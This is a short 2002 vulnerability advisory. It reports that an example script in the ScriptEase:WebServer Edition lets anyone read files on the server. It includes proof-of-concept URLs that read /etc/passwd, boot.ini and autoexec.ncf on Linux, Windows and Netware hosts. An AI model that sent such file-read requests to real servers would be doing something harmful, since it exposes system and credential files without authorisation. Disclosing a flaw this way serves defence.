ScriptEase:WebServer Edition vulnerability

2002-02-26T00:00:00
ID SECURITYVULNS:DOC:2549
Type securityvulns
Reporter Securityvulns
Modified 2002-02-26T00:00:00

Description

Program: ScriptEase:WebServer Edition Url: www.nombas.com Problem: Any user can read files on server using one of examle scripts: comment2.jse Systems affected: Linux, Novell Netware, Windows 9x/NT/2k

Example: WindowsNovell Netware: http://novellhost/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf SET CLIENT FILE ...: http://this.was.the.funniest/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini [boot loader] timeout=10 ...

Linux: http://linuxhost/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd root:....

I found this in a default instalation of Novell Netware 5.1... Sorry for my english.


Aleksander Posmyk - blah@lucyfer.omi.pl